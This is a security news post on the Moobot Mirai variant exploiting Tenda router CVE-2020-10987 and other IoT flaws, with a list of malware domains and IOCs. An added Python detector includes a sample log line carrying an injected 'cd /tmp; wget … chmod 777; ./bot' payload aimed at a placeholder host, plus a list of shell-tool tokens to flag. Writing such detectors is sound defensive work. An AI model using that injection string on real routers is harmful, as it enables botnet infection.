
Mirai Botnet Is Back. This Time It Is Targeting Multiple Vulnerabilities.

AT&T Alien Labs researchers have identified a new Mirai variant that is scanning the internet for an uncommon security vulnerability in Tenda routers.

This variant, dubbed “Moobot”, has been seen being delivered via a new malware-hosting domain named “Cyberium”. Alien Labs revealed that it was noticed because of a peak in exploitation attempts for the Remote Code Execution vulnerability (CVE-2020-10987) in Tenda routers.

“This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it,” the AT&T blog stated.
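The quoted description gives a defender everything needed for a web-log detection: the request path contains setUsbUnload and the deviceName parameter carries a shell command chain instead of a device name. The following Python is an added example written for this post, not code from AT&T Alien Labs or from the Tenda firmware. The access-log lines are constructed samples, the URL path prefix and the host name malware-host.invalid are placeholders (the post only says the URL "includes setUsbUnload"), and the client addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common-log-format entry: client, then "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Shell separators and download/exec tokens that never belong in a USB device name.
SHELL_SEPARATORS = (";", "|", "&", "`", "$(", "\n")
SUSPICIOUS_TOKENS = ("wget", "curl", "tftp", "chmod", "/tmp")

# Constructed sample log lines (not taken from the AT&T report). The second one
# mirrors the payload logic the post describes: cd to a temp dir, wget, chmod, run.
SAMPLE_ACCESS_LOG = [
    '10.0.0.7 - - [09/Jun/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Jun/2021:10:01:03 +0000] "GET /setUsbUnload?deviceName='
    'x%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2Fmalware-host.invalid%2Fbot%3Bchmod+777+bot%3B.%2Fbot'
    ' HTTP/1.1" 200 0',
    '10.0.0.9 - - [09/Jun/2021:10:01:04 +0000] "GET /setUsbUnload?deviceName=sda1 HTTP/1.1" 200 0',
]


def classify_request(target):
    """Return a reason string if the target looks like a setUsbUnload injection attempt, else None.

    Matching on the path substring (not a full path) follows the post, which only
    says the exploit URL "includes" setUsbUnload.
    """
    parts = urlsplit(target)
    if "setUsbUnload" not in parts.path:
        return None
    params = parse_qs(parts.query)  # decodes %xx escapes and '+' for us
    for value in params.get("deviceName", []):
        hits = [sep for sep in SHELL_SEPARATORS if sep in value]
        hits += [tok for tok in SUSPICIOUS_TOKENS if tok in value.lower()]
        if hits:
            return "deviceName contains " + ", ".join(repr(h) for h in hits)
    return None


def scan_access_log(lines):
    """Yield one finding per log line whose request matches the exploit pattern."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        reason = classify_request(m.group("target"))
        if reason:
            findings.append(
                {"client": m.group("client"), "target": m.group("target"), "reason": reason}
            )
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['client']}: {f['reason']}")
```

The benign request with deviceName=sda1 is deliberately included so the rule is checked against a legitimate value as well as the injection; a rule that only keys on the setUsbUnload path would alert on every normal USB unmount from the router's own web UI.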

[Figure: BinaryEdge sensor]

Alien Labs researchers confirmed that the scan for Tenda routers lasted only a day; however, scanning activity continued for multiple weeks against the vulnerabilities listed below on other products.

  • Port 80 and 8080: Axis SSI RCE.
  • Port 34567: DVR scanner attempting default credentials for Sofia main video application.
  • Port 37215: Huawei Home routers RCE Vulnerability (CVE-2017-17215).
  • Port 52869: Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361).

“All of them appeared to be pulling their next iteration of the malware from the same malware hosting page: dns.cyberium[.]cc,” the Alien Labs blog stated.

The full list of subdomains/campaigns identified from this domain is:

  • Snoopy.cyberium[.]cc: Around May 2020
  • U.cyberium[.]cc: Around May 2020
  • Gcc.cyberium[.]cc: Around June 2020
  • Park.cyberium[.]cc: Around July 2020
  • Hoon.cyberium[.]cc: Around July 2020
  • Hh.cyberium[.]cc: Around September 2020
  • Wo.cyberium[.]cc: Around October 2020
  • Y.cyberium[.]cc: Around October 2020
  • W.cyberium[.]cc: Around November 2020
  • Ns.cyberium[.]cc: Around November 2020
  • Tmp.cyberium[.]cc: Around December 2020
  • Ftp.cyberium[.]cc: Around March 2021
  • Dns.cyberium[.]cc: Around April 2021
  • Ddns.cyberium[.]cc: Around April 2021

Other infrastructure controlled by the same actor and used as Moobot command-and-control (C2) servers:

  • Park.allcheesedout[.]cc: around September 2020
  • Ratatouille.allcheesedout[.]cc: around September 2020
  • Watchdog.allcheesedout[.]cc: around September 2020
  • Bot.bigbots[.]cc: around February 2021
  • Cnc.bigbots[.]cc: around February 2021
  • Cnc1.bigbots[.]cc: around February 2021
  • Cnc.fewbots[.]cc: created and up since February 2021
  • Bot.fewbots[.]cc: created and up since February 2021
  • Cnc.hardbotz[.]cc: created and up since March 2021
  • Projectaliennet[.]cc: created and up since March 2021
  • Life.zerobytes[.]cc: created in May 2021

Indicators of Compromise:

TYPE    INDICATOR                         Sample names
DOMAIN  cyberium[.]cc                     Malicious domain
MD5     fbdc24f589e99088cec5fc77257c81f3  Moobot
MD5     78ecbd418cac0a1af9feb860fceae2f9  Satori
MD5     14c629f43d3e05615ea1b25d3e4aa1fa  Unassigned variant
MD5     555821a5f67d064362e8ce9a48b95d56  Fbot with UPX

For more cyber security news in crisp form, please follow our site via the Twitter handle @cyberworkx1.
